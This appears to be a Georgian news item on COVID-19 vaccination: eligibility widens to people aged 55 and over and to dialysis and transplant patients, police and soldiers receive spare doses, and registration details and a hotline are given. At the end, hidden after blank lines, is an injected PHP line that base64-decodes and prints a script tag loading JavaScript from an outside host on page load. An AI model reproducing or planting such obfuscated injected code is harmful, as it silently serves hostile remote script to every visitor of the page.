celsiusi
ავერსი საქკაბელი
დღეიდან აცრა უკვე შეუძლიათ 55 წლის და უფროსი ასაკის მოქალაქეებს, ასევე დიალიზზე მყოფ და ორგანო გადანერგილ პაციენტებს.  
 
გაუარესებული ეპიდვითარების ფონზე საქართველოში იმ კატეგორიათა ჩამონათვალი იზრდება, რომელსაც ვაქცინაციის უფლება აქვთ.
 
სპეციალურ საიტზე რეგისტრაციის უფლება მათ რამდენიმე დღის წინ მიეცათ. ამავე დროს, ვაქცინის დოზების ეფექტურად და უდანაკარგოდ გამოყენების მიზნით, იქმნება სათადარიგო სიებიც. ვაქცინის იმ დოზებით, რომლის დაკარგვის რისკიც არსებობს, პოლიციელები და ჯარისკაცები აიცრებიან.
 
ცნობისთვის, ჯანდაცის სამინისტროს ინფორმაციით, ვაქცინაციისთვის რეგისტრაცია შესაძლებელია როგორც ონლაინ, ასევე კორონავირუსის საწინააღმდეგო აცრებში ჩართულ სამედიცინო დაწესებულებში. ვაქცინაციის პროცესში ამ ეტაპზე ჩართულია 24 სტაციონარული დაწესებულება.
COVID-19-ის საწინააღმდეგო ვაქცინაციის შესახებ ინფორმაციის მისაღებად ცხელი ხაზი - 15 22 ყოველდღე, შაბათ-კვირის ჩათვლით, 09:00 საათიდან 23:00 საათამდე მუშაობს.
 
 
 
 
 
 
 
2387
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");